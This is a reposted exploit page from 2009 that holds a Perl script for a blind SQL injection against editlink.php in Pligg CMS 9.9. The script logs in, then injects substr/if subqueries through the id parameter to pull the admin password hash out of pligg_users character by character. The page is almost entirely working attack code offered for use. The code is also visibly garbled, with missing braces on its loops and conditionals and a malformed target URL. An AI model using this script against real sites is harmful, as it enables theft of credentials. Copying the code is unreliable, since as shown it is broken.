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Pligg 9.9.0 (editlink.php id) Blind SQL Injection Exploit
来源:www.Schap.Org 作者:Bansal 发布时间:2009-04-21  


# Pligg v9.9 Blind SQL Injection
# vuln:
#   editlink.php? SQL Injection:
#   (magic_quotes off)
#   This exploit is possible because the $id variable in check_url.php is taken
#   from the url and then used in an SQL query without being sanitized.
#  by Rohit Bansal [rohitisback@gmail.com] www.Schap.Org
#  original advisory: http://www.milw0rm.com/exploits/5406 (Guido Landi)

 use LWP::UserAgent;
 use HTTP::Request;
 use HTTP::Cookies;

@chars = split(//, "0123456789abcdef");
                                                         ####### CHANGE THESE ########
my $url = "http://victim.compath-to-pligg/";                      # site and path to pligg
my $mylink = 1;                                             # link the user posted
my $username = "user";                                      # username to log in with
my $password = "password";                                  # password to log in with

my $hash;
my $content;

print "\nPligg CMS v9.9 editlink.php Blind SQL Injection\n\n";

print "+ Logging in to $url\n";
print "+ Extracting hash...\n";

$b = LWP::UserAgent->new() or die;
$cj = HTTP::Cookies->new;

$req = HTTP::Request->new(POST=>$url."login.php");
$res = $b->request($req);

print "User god hash: ";

for($i = 0;$i < 50; $i++)
   for($j = 0; $j < 16; $j++)
       $craft  = "editlink.php?id=(select(if((select%20substr(user_pass,$i,1)%20from%20pligg_users%20where%20";
       $craft .= "user_id=1)=\'" . $chars[$j] . "\'," . $mylink . ",-999)))";
       $req = HTTP::Request->new(GET=>$url.$craft);
       $res = $b->request($req);

       $content = $res->content;    
      if(!($content =~ /not your link/i))
     print $chars[$j];
         $hash .= $chars[$j];

print "\n";

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